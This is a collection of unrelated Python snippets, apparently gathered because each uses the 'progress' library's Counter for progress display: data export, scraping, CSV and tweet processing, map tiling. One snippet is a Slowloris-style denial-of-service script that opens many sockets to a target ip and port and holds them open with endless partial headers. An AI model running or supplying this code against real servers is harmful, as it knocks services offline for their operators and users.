def _process_file(mapper: Mapper, fname: str, pool: Pool, file_name_suffix: str, chunksize: int) -> Path: """ Creates a new CSV file by running each row in the input file named fname through the mapper using multiple processes. """ ROW_FIELD = "_row" try: output_path = _output_file_path(fname, file_name_suffix) with open(fname, "r") as csvin, open( output_path, "w") as csvout, Counter(f"{fname}: ") as counter: fieldnames = [ROW_FIELD, SUCCEEDED_FIELD] + mapper.fieldnames reader = csv.DictReader(csvin) writer = csv.DictWriter(csvout, fieldnames=fieldnames) writer.writeheader() for i, row in enumerate( pool.imap(mapper.map, reader, chunksize=chunksize), 1): counter.next() try: row[ROW_FIELD] = i writer.writerow(row) csvout.flush() except ValueError as ex: LOG.error("error writing row: %s", str(ex)) return output_path except KeyboardInterrupt: sys.stderr.write("Cancelled by Ctrl-C!\n") pool.terminate() pool.join() sys.exit(130)
def getProjectLinks(url): print("Gathering links...") projectLinks = set() browser = webdriver.Firefox("C:\Program Files\gecko") browser.get(url) #Wait for website to load time.sleep(5) #Closes cookie-acceptance pop-up try: browser.find_element_by_css_selector( '#CybotCookiebotDialogBodyLevelButtonAccept').click() except: pass counter = Counter("Propagating webpages") #Simulates click on 'view more' button until exhausted while (True): try: #waits random time to prevent DDOS ban time.sleep(random.uniform(0.2, 1.3)) browser.find_element_by_css_selector('a.ng-isolate-scope').click() except: break counter.next() counter.finish() links = browser.find_elements_by_xpath("//a[@href]") for bigl in links: #Ensures that the link is a valid project if "/projects/" in bigl.get_attribute( "href") and "/coming_soon/" not in bigl.get_attribute("href"): projectLinks.add(bigl.get_attribute("href")) browser.quit() return projectLinks
def split_video(filepath: str, output_dir: str, metadata): files = glob.glob(filepath + '/*') for f in files: os.remove(f) cap = cv.VideoCapture(filepath) prev = None curr = None i = 0 mse = 100 counter = Counter("Splitting ") while cap.isOpened(): ret, curr = cap.read() # if frame is read correctly ret is True if not ret: break if prev is not None: mse = (np.square(curr - prev)).mean(axis=None) if mse > MSE_THRESH: new_size = (curr.shape[1] // DOWNSCALE, curr.shape[0] // DOWNSCALE) resized = cv.resize(curr, new_size) cv.imwrite(output_dir + FORMAT_STRING.format(i), resized) prev = curr i += 1 counter.next() cap.release() yield
async def export_users(ctx: ExporterContext): users_generator = await utils.with_retry(ctx.slack_client.users_list) all_users = [] counter = Counter("Exporting users ") try: async for users in users_generator: all_users.extend(users["members"]) for user in users["members"]: user_obj = models.SlackUser(user) counter.next() for url, filename in user_obj.get_exportable_data(): full_filename = os.path.join(constants.USERS_EXPORT_DIR, filename) ctx.downloader.enqueue_download(url, full_filename) await ctx.downloader.flush_download_queue() except SlackApiError as e: log.error("Got an API error while trying to export user info", exc_info=e) ctx.downloader.write_json( os.path.join(constants.USERS_EXPORT_DIR, constants.USERS_JSON_FILE), all_users) counter.finish()
def count_files(inp): counter = Counter('Loading files tree... ') t = 0 for dirpath, dirs, files in os.walk(inp): for filename in files: t += 1 counter.next() counter.finish() print return t
def start_sampling(self, percentile_samples: int, info: str) -> None: """To run exact compute of the interval or select randomly a subset of all possible programs (combining the values of its annotations) to perform an approximation of the exact interval""" ##To find all possible consistent programs #local_n_programs = {} n_used_vars = len(self.used_vars) poss_prog_format = '{0:0' + str(n_used_vars) + 'b}' poss_asignations = pow(2, n_used_vars) counter = Counter('Processing possible programs (%d): ' % (poss_asignations), max=poss_asignations) for asignation in range(poss_asignations): asign_list = list(poss_prog_format.format(asignation)) unique_world_program = ['x'] * self.utils.em_vars for index, value in enumerate(asign_list): unique_world_program[int(self.used_vars[index])] = int(value) prog, id_prog = self.utils.map_world_to_prog(unique_world_program) if id_prog not in self.local_n_programs: self.local_n_programs.append(id_prog) #evidence = {str(self.used_vars[index]):int(val) for index, val in enumerate(asign_list)} #self.local_n_programs[id_prog] = self.utils.em.get_sampling_prob(evidence) counter.next() counter.finish() ## #n_programs = self.utils.get_n_programs() n_programs = len(self.local_n_programs) print("Number of programs: " + str(n_programs)) if percentile_samples == 100: # To compute the exact interval lit_to_query = self.utils.search_lit_to_consult() n_samples = n_programs unique_programs = self.local_n_programs #unique_programs = range(n_programs) repeated_programs = 0 # ???? else: lit_to_query = self.utils.get_interest_lit() n_samples = int(get_percentile(percentile_samples, n_programs)) sampled_programs = np.random.choice(self.local_n_programs, n_samples, replace=True) #sampled_programs = np.random.choice(n_programs, n_samples, replace=True) unique_programs = list(set(sampled_programs)) repeated_programs = n_samples - len(unique_programs) prog_data = self.consult_programs(unique_programs, self.adapted_annots, lit_to_query) execution_time, inconsistent_programs = prog_data self.results['data'] = { 'n_samples': n_samples, 'time': execution_time, 'repeated_programs': repeated_programs, 'inconsistent_programs': inconsistent_programs, 'worlds_consulted': len(self.known_evidences) } write_results(self.results, self.utils.save_path, info)
def import_NICE_KSAT(self, workbook): """Import the NICE KSATs and their relationships with Workroles :param workbook: NICE CWF spreadsheet represented as a python class :type workbook: class 'xlrd.book.Book' """ log.info("Parsing NICE CWF KSATs") bar = Counter( 'Parsing NICE CWF KSATs ', suffix='%(percent)d%% (%(index)d/%(max)d) [%(elapsed_td)s]') all_sheets = workbook.sheets() graph = self.db.graph for sheet in all_sheets: if not re.match(r"[A-Z]+-[A-Z]+-[0-9]+", sheet.name): continue workrole_id = re.match(r"([A-Z]{2}-[A-Z]{3}-[0-9]{3})", sheet.name)[1] for row in sheet._cell_values: # capture and store the KSAT unless it's a header row try: ksat = parse_ksats(row[0])[0] except Exception: # Ignore header rows that don't contain KSATs continue ksat_node = KSAT() ksat_node.id = ksat ksat_node.description = row[1] ksat_node.type = ksat_id_to_type(ksat) # create the node if it doesn't exist graph.create(ksat_node) # pull the current relationships from the db graph.pull(ksat_node) ksat_node.__node__.add_label(ksat_node.type.capitalize()) ksat_node.nice_workrole.add( NICEWorkrole.match(graph, workrole_id).first()) # store the updated relationship in the db graph.push(ksat_node) bar.next() bar.finish() log.info("Done Parsing NICE CWF KSATs")
def analyzeArticles(self, preprocessor: preprocessing.Preprocessor, dtype='reuters'): #check data type if dtype == 'reuters': #initialize SoupLoader soupLoader = data.SoupLoader(-1) provider = data.ReutersProvider(soupLoader) else: provider = data.TwentyNewsProvider('../TwentyNews/') #start Counters bar = PCounter("Analyzing Articles: ") counter = Counter() occurances = Counter() categories = Counter() while True: try: #increase bar progress bar.next() #throws an exception if there are no more articles. saving is not needed article = data.ArticleFactory.GET_NEXT_ARTICLE(provider) #update the counter with the preprocessed array of words words = preprocessor.process(article).preprocessed counter.update(words) #update in how many articles these words occur occurances.update(list(words.keys())) #update categories counter categories.update([article.category]) except data.OutOfArticlesError: #abort while loop. No more Articles break bar.finish() self._articleCount = bar.index self._words = self.cropWords(counter, occurances) self._categories = categories
def __init__(self, method, query_ops): if method == Collector._search: self.dates = (query_ops['since'], query_ops['until']) elif method == Collector._stream: self.dates = (datetime.date.today(), query_ops['until']) else: self.dates = None if self.dates: days = (self.dates[1] - self.dates[0]).days self._progress = Bar('Processing day: ', max=days) else: self._progress = Counter('Processing tweets: ')
def __init__(self): super().__init__() self.counter = 0 self.run_forever = True self.limit = 0 if len(sys.argv) > 1: # No user-provided value, run forever self.limit = int(sys.argv[1]) self.run_forever = False self.bar = Bar('Collecting tweets...', max=self.limit) else: self.bar = Counter('Collecting tweets...')
def load_tweets(): training_data_load_file = open("data_files/perceptron_traindata.json", "r") training_data = json.load(training_data_load_file) preprocessed_training_data = {} stop_terms = generate_stop_terms("config_files/preprocess_stop_terms.txt") counter = Counter("Loading tweets...") for (tweet, rating) in training_data.items(): new_tweet = preprocess(tweet, stop_terms) new_tweet_text = " ".join(new_tweet) preprocessed_training_data[new_tweet_text] = rating counter.next() counter.finish() return preprocessed_training_data
def consult_programs(self, unique_programs: list, adapted_annots: dict, lit_to_query: list) -> list: """To iterate over sampled programs consulting for literals""" self.results['status'] = { lit: copy.copy(STATUS) for lit in lit_to_query } # To count the number of inconsistent programs sampled inconsistent_programs = 0 counter = Counter('Processing programs (%d): ' % (len(unique_programs)), max=len(unique_programs)) initial_time = time.time() for sampled_prog in unique_programs: sampled_in_bin = self.utils.id_prog_to_bin(sampled_prog) # Build the program from the sampled annotations #self.replace_in_program(sampled_in_bin) # To create the expression that generate a sampled program expression = '' for index, value in enumerate(sampled_in_bin): if self.utils.prog_in_bin[index] == 'x': if value == 1: expression += adapted_annots[index]['True'] + ' & ' else: expression += adapted_annots[index]['False'] + ' & ' flag = False #program = self.utils.map_bin_to_prog(self.utils.prog_in_bin) program = self.utils.map_bin_to_prog(sampled_in_bin) status = query_to_delp(program, lit_to_query) prob = float(0.0) models = satisfiable(eval(expression[:-3]), all_models=True) for model in models: if model: # The sampled program is consistent, is a valid program evidence = to_evidence(model) if evidence not in self.known_evidences: # Get probability of the new evidence prob += self.utils.em.get_sampling_prob(evidence) self.known_evidences.append(evidence) else: # To sampled program is inconsistent inconsistent_programs += 1 flag = True if not flag: self.update_results(status, prob) self.update_results(status, prob) counter.next() counter.finish() print(self.utils.model_path + " <<Complete>>") execution_time = time.time() - initial_time return [execution_time, inconsistent_programs]
def consult_worlds(self, worlds: list, lit_to_query: list) -> float: """To iterate over sampled worlds consulting for literals""" self.results['status'] = { lit: copy.copy(STATUS) for lit in lit_to_query } # To control if worlds are sampled or generated if isinstance(worlds[0], (int, np.int64)): to_convert = 'self.utils.id_world_to_bin(sampled_world)' else: to_convert = 'sampled_world' counter = Counter('Processing worlds: ', max=len(worlds)) initial_time = time.time() for sampled_world in worlds: # Get world in list format world, evidence = eval(to_convert) # Get the probability of the world prob_world = self.utils.em.get_sampling_prob(evidence) # Build the program for world program, id_program = self.utils.map_world_to_prog(world) status = self.known_progs.search_sample(id_program) if status == -1: # New program status = query_to_delp(program, lit_to_query) self.known_progs.save_sample(id_program, status) for literal, response in status.items(): # Update number of worlds self.results['status'][literal][response['status']] += 1 # Update probabilities self.results['status'][literal][ 'p' + response['status']] += prob_world # Save time to compute the query in the world self.results['status'][literal]['time'] += response['time'] else: # Known program for literal, response in status.items(): # Update number of worlds self.results['status'][literal][response['status']] += 1 # Update probabilities self.results['status'][literal][ 'p' + response['status']] += prob_world # Save time to compute the query in the world self.results['status'][literal]['time'] += 0 counter.next() counter.finish() print(self.utils.model_path + " <<Complete>>") execution_time = time.time() - initial_time return execution_time
def cli_runner(*varags, **args): signal(SIGINT, ctrl_c_handler) # Handle Ctrl + C settings = Settings.instance() settings.set(args) if settings.debug: print("Command line inputs: " + str(varags)) counter = None if settings.ui: counter = Counter('Discovering Files: ') def counter_func(): if counter != None: counter.next() files_to_process = [] if len(varags) > 0: for arg in varags: files_to_process += find_files(arg, counter_func) else: if settings.debug: print("No inputs provided, Scanning local directory") files_to_process = find_files(PWD, counter_func) if counter: counter.finish() problematic_certs = process_certs(files_to_process, settings) if settings.save_results: save_file(problematic_certs) for problem in problematic_certs: print(problem) if settings.send_to_slack and len(problematic_certs) > 0: send_to_slack(problematic_certs)
def main(): args = get_arguments() if args.verbosity >= 1: print("\n--- Generating barcodes ---") barcodes =[] for i in range(args.numOfBc): barcode = generate_barcode(args.length, "") if not len(barcodes) == 0: if args.verbosity >=2: c = Counter(" Barcode {} candidate no: ".format(i+1)) while (not 0.4<=gc_content(barcode)<=0.6) or min(distance(barcode,previous_bc) for previous_bc in barcodes)<=args.distance: barcode = generate_barcode(args.length, "") if args.verbosity >=2: c.next() if args.verbosity >=2: c.finish() print("") barcodes.append(barcode) if args.verbosity >= 1: print('Barcode {}: {}'.format(i+1, barcode)) print('GC-content: {}'.format(gc_content(barcode))) write_2_file(barcodes, args.output, args.verbosity) return
def get_messages(self): # Get all messages of user # Output format: # [{'id': '13c...7', 'threadId': '13c...7'}, ...] # if os.path.exists("messages.pickle"): # with open("messages.pickle", "rb") as token: # messages = pickle.load(token) # return messages # includeSpamTrash # labelIds response = self.service.users().messages().list( userId=self.user_id).execute() messages = [] est_max = response["resultSizeEstimate"] * 5 progress = Counter( f"{helpers.loader_icn} Fetching messages page ".ljust( _progressPadding, " ")) if "messages" in response: messages.extend(response["messages"]) while "nextPageToken" in response: page_token = response["nextPageToken"] response = (self.service.users().messages().list( userId=self.user_id, pageToken=page_token).execute()) messages.extend(response["messages"]) progress.next() progress.finish() return messages
async def export_files(ctx: ExporterContext): files_generator = utils.AsyncIteratorWithRetry( ctx.slack_client.files_list, count=constants.ITEM_COUNT_LIMIT, ts_to=ctx.export_time #, ts_from=ctx.last_export_time ) all_files = [] counter = Counter("Exporting files ") try: await files_generator.run() async for file_resp in files_generator: all_files.extend(file_resp["files"]) for sfile in file_resp["files"]: file_obj = models.SlackFile(sfile) export_file(ctx, file_obj) counter.next() try: await ctx.downloader.flush_download_queue() except utils.AggregateError as e: log.warning( f"Caught {len(e.errors)} errors while downloading files.") for err in e.errors: log.warning(str(err)) except SlackApiError as e: log.error(f"Got an API error while trying to obtain file info", exc_info=e) ctx.downloader.write_json( os.path.join(constants.FILES_EXPORT_DIR, constants.FILES_JSON_FILE), all_files) counter.finish()
def main(): # open the books.csv file inloop = True books_csvfile_path = "../books.csv" books_csvfile = None while inloop: try: if (books_csvfile_path.endswith("books.csv")): books_csvfile = open(os.path.realpath(books_csvfile_path)) inloop = False else: raise FileNotFoundError() except FileNotFoundError as error: print("We couldn't find the 'books.csv' file.\n") books_csvfile_path = input( "Please input the 'books.csv' absolute file path: ") inloop = True books = csv.reader(books_csvfile) # itterate through all books row_count = 0 print(' This process may take long') progress = Counter(' - Importing books: ') for isbn, title, author, year in books: # this skips first line of the file because it contains the csv headers. if not (row_count == 0): book = Book(isbn, title, author, year) book.insertToTable() progress.next() row_count += 1 db.commit() progress.finish() db.remove() print(" Books imported succesfully!")
def add_progress_bar(self): self.progress_indicator = Counter(self.name)
def scrape(self, filename): """ Scrapes metadata of S2ORC articles from given file :param filename: name of file in data folder to scrape from """ print( f'Collection: {self._collection.database.name}.{self._collection.name}. Database: S2ORC. File: {filename}' ) abstracts = [] articles = [] no_id = 0 unreadable = 0 # counter counter = Counter(message='Articles analyzed: ') file = open(os.path.join(DATA_PATH, filename), 'r') # load GB to US dictionary with open('miscellaneous/us_gb_dict.txt', 'r') as convert: spelling = json.load(convert) print('Stored json dictionary in memory') for data in file: article = json.loads(data) # ignore abstract if article is not from PubMed or PubMedCentral uid = article.get('pubmed_id') pmc = article.get('pmc_id') doi = article.get('doi') paperid = article.get('paper_id') if not uid and not pmc and not doi and not paperid: no_id += 1 counter.next() continue # store abstract text for use by mat2vec below abstract = article.get('abstract') # continues if paper does not have abstract if not abstract: unreadable += 1 counter.next() continue # replaces ':::' with newline abstract = abstract.replace('::: ', '\n') # segments abstract by sentence doc = self.nlp(abstract) sentences = [] is_unreadable = False # processes sentence text using mat2vec processor for sent in doc.sents: try: tokens, materials = self.processor.process(sent.text) except OverflowError: is_unreadable = True break processed_sent = ' '.join( [token.lemma_ for token in sent if not token.is_stop]) for gb, us in spelling.items(): processed_sent = processed_sent.replace(gb, us) sentences.append(processed_sent) # if processor (from above) throws an error, skip the paper if is_unreadable: unreadable += 1 counter.next() continue processed_abstract = '\n'.join(sentences) # create new document and store new article document if not in collection article = { 'doi': doi, 'uid': uid, 'pmc': pmc, 'paperid': paperid, 'title': article.get('title'), 'abstract': abstract, 'url': article.get('s2_url'), 'creators': self._get_creators(article.get('authors')), 'publication_name': article.get('journal'), 'year': article.get('year'), 'database': 's2orc', 'processed_abstract': processed_abstract } articles.append(article) abstracts.append(processed_abstract) counter.next() # classify abstracts if 20000 have been stored if len(abstracts) == 20000: self._store(articles, abstracts) articles = [] abstracts = [] counter.finish() # unreadable papers print(f'No ID: {no_id}') print(f'Unreadable papers: {unreadable}') # classifies and stores metadata if abstracts: self._store(articles, abstracts) print() else: print('No abstracts to classify.\n') return # prints classifier metrics for classifier in self._classifiers: classifier.print_metrics() classifier.reset_metrics() # prints general tag metrics if self._save: print(f'Total articles analyzed: {self._gen_total}.') print( f'Stored {self._gen_new} new abstracts to \'{self._gen_tag}\'.' ) print() self._gen_new = 0 self._gen_total = 0
def init(ip, port): soc = socket(AF_INET, SOCK_STREAM) soc.settimeout(4) soc.connect((ip, int(port))) soc.send('GET /?{} HTTP/1.1\r\n'.format(randint(0,2000)).encode('utf-8')) for header in headers: soc.send('{}\r\n'.format(header).encode('utf-8')) return soc if __name__ == '__main__': if len(argv)<5: exit(REDC+"Usage: {} ip port count time".format(argv[0])) socketList = [] logger.info('count: {} timer: {}'.format(count, timer)) bar = Counter(GREENC+'Creating sockets: '+YELLOWC, max=count) for _ in range(count): try: soc=init(ip, port) except error: break socketList.append(soc) bar.next() print() while True: sendbar = PixelBar(GREYC+'Sending keep-alive Headers'+REDC, max=timer) logger.info('Sending keep-alive Headers') for soc in socketList: try: soc.send('X-a {}\r\n'.format(randint(1,6000)).encode('utf-8')) except error: socketList.remove(soc)
def counter_progress_cli(msg, max=0): return Counter(msg + ' - ')
urlHtml = requests.get(url).content # soup object of html soup = bs(urlHtml, 'lxml') # goes through each tag with an href in the page for tag in soup.find_all(href=True): # href in tag href = tag['href'] href # checks that it is uri and that it is not '/' or '#' and that it isn't already in list if (href.startswith('/') and not href.startswith('//') and len(href) > 1 and href not in hrefs): # adds href to list hrefs.append(href) count = Counter("Scraping : ") # list for hrefs hrefs = [] # input for base url, base = input() # checks if base ends with '/' if (base.endswith('/')): # postion of last character before '/' lastPos = len(base) - 1 # removes '/' from base base = base[0:lastPos] # gets all the hrefs from base URL getHrefs(base, "", hrefs) # loops through hrefs # hrefs will be added as it loops through each href # but will end once all hrefs have been check
async def export_conversation_history(ctx: ExporterContext, convo: models.SlackConversation): def file_filter(raw_file: Dict[str, Any]) -> bool: if "mode" in raw_file and raw_file["mode"] == "tombstone": return False filename = os.path.join(constants.FILES_EXPORT_DIR, raw_file["id"]) return not ctx.downloader.exists(filename) history_generator = utils.AsyncIteratorWithRetry( ctx.slack_client.conversations_history, channel=convo.id, limit=constants.ITEM_COUNT_LIMIT, latest=ctx.export_time, oldest=ctx.last_export_time) history_folder = os.path.join(ctx.output_directory, constants.CONVERSATIONS_EXPORT_DIR, convo.id, constants.HISTORY_JSON_DIR) history_fragment = ctx.fragments.create(history_folder) temporary_dir = tempfile.TemporaryDirectory() temp_fragment = ctx.fragments.create(temporary_dir.name) counter = Counter(f"Exporting conversation history ({convo.name}) ") try: await history_generator.run() async for history_resp in history_generator: for msg in history_resp["messages"]: msg_obj = models.SlackMessage(msg) try: if msg_obj.has_files: files = await msg_obj.get_files(ctx, file_filter) for f in files: export_file(ctx, f) except SlackApiError as e: log.error( f"Error while obtaining file metadata for message {msg_obj.ts} in channel {convo.id}", exc_info=e) try: if msg_obj.has_replies: await msg_obj.populate_replies(ctx, convo) except SlackApiError as e: log.error( f"Error while obtaining reply metadata for message {msg_obj.ts} in channel {convo.id}", exc_info=e) temp_fragment.append(msg_obj.data) counter.next() try: await ctx.downloader.flush_download_queue() except utils.AggregateError as e: log.warning( f"Caught {len(e.errors)} errors while downloading files.") for err in e.errors: log.warning(str(err)) temp_fragment.commit_fragments() except SlackApiError as e: log.error( f"Got an API error while trying to obtain conversation history", exc_info=e) except Exception as e: log.error( f"Uncaught {e.__class__.__name__}; you may need to do a full resync", exc_info=e) history_fragment.extend( temp_fragment[::-1]) # Slack messages are stored in descending order temp_fragment.close() history_fragment.close() temporary_dir.cleanup() counter.finish()
def read_tiles(src, min_zoom=0, max_zoom=None, tile_size=256): """This function is a generator that reads all tiles that overlap with the extent of src between min_zoom and max_zoom. Parameters ---------- src : rasterio.DatasetReader Input dataset, opened for reading min_zoom : int, optional (default 0) max_zoom : int, optional (default None) If None, max_zoom will be calculated based on the extent of src tile_size : int, optional (default 256) length and width of tile Yields ------ tile (mercantile.Tile), tile data (of shape (tile_size, tile_size)), and tile transform """ def _read_tile(vrt, tile, tile_size=256): """Read a tile of data from the VRT. If the tile bounds fall outside the vrt bounds, we have to calculate offsets and widths ourselves (because WarpedVRT does not allow boundless reads) and paste the data that were read into an otherwise blank tile (filled with Nodata value). Parameters ---------- vrt : rasterio.WarpedVRT WarpedVRT initialized from the data source. Example: with WarpedVRT( src, crs="EPSG:3857", nodata=src.nodata, resampling=Resampling.nearest, width=tile_size, height=tile_size, ) as vrt tile : mercantile.Tile Tile object describing z, x, y coordinates tile_size : int, optional (default 256) length and width of tile Returns ------- tuple of numpy array of data with shape (tile_size, tile_size), tile transform object """ tile_bounds = mercantile.xy_bounds(*tile) window = vrt.window(*tile_bounds) dst_transform = vrt.window_transform(window) scaling = Affine.scale(window.width / tile_size, window.height / tile_size) dst_transform *= scaling x_res = abs(dst_transform.a) y_res = abs(dst_transform.e) left_offset = max( int(round((vrt.bounds[0] - tile_bounds[0]) / x_res, 0)), 0) right_offset = max( int(round((tile_bounds[2] - vrt.bounds[2]) / x_res, 0)), 0) bottom_offset = max( int(round((vrt.bounds[1] - tile_bounds[1]) / y_res, 0)), 0) top_offset = max( int(round((tile_bounds[3] - vrt.bounds[3]) / y_res, 0)), 0) width = tile_size - left_offset - right_offset height = tile_size - top_offset - bottom_offset if not (width > 0 and height > 0): # No data can be read within an window that has no width or height # so return a blank tile data = np.empty((1, tile_size, tile_size), dtype=vrt.dtypes[0]) data.fill(vrt.nodata) return data[0], dst_transform data = vrt.read(out_shape=(1, height, width), window=window) if width != tile_size or height != tile_size: # Create a blank tile (filled with nodata) and paste in data out = np.empty((1, tile_size, tile_size), dtype=vrt.dtypes[0]) out.fill(vrt.nodata) out[0, top_offset:top_offset + data.shape[1], left_offset:left_offset + data.shape[2], ] = data data = out return data[0], dst_transform with WarpedVRT( src, crs="EPSG:3857", nodata=src.nodata, resampling=Resampling.nearest, width=tile_size, height=tile_size, ) as vrt: if max_zoom is None: get_default_max_zoom(src) tiles = mercantile.tiles(*get_geo_bounds(src), range(min_zoom, max_zoom + 1)) for tile in Counter("Extracting tiles... ").iter(tiles): data, transform = _read_tile(vrt, tile, tile_size) yield tile, data, transform
temporary_directory_path = os.path.abspath(args.temporary_directory_path) checkpoint = args.checkpoint with open(corpus_path, "r") as corpus_file, tempfile.TemporaryDirectory( dir=temporary_directory_path) as tmp_file_dir, Pool( processes=cpu_count()) as pool: if args.split_by_lines: print("Splitting by number of lines") articles = extract_article_by_number_of_sentence( corpus_file, args.split_by_lines) else: print("Splitting by blank lines") articles = extract_article_by_blank_lines(corpus_file) results = [] for i, article in Counter("Spawning threads...").iter( enumerate(articles)): if i < checkpoint: continue while psutil.virtual_memory().free * 0.9 < psutil.Process( os.getpid()).memory_full_info().rss / (i + 1): print(f"""Waiting 5s for RAM to be freed. Currently {psutil.virtual_memory().percent}% of RAM is used.""" ) sleep(5) print([res.get() for res in results]) f_args = ( article, output_path, vocab_path,
return startupTime, traffic startupTime = time() traffic = 0.0 with open('./data.csv', 'r') as csvreader: allRows = list(csv.DictReader(csvreader)) allRowsForWrite = list(allRows) i = 0 ids = [] urls = [] scientific_names = [] bar = Counter('Процесс загрузки: ') for row in allRows: atexit.register(ataxit_handler, allRowsForWrite=allRowsForWrite) i += 1 if i > 20: imagesContent = get_images(urls) startupTime, traffic = set_images(ids, scientific_names, imagesContent, startupTime, traffic) del allRowsForWrite[:20] i, ids, urls, scientific_names = 1, [], [], [] ids.append(row['id']) urls.append(row['image_url']) scientific_names.append(row['scientific_name'])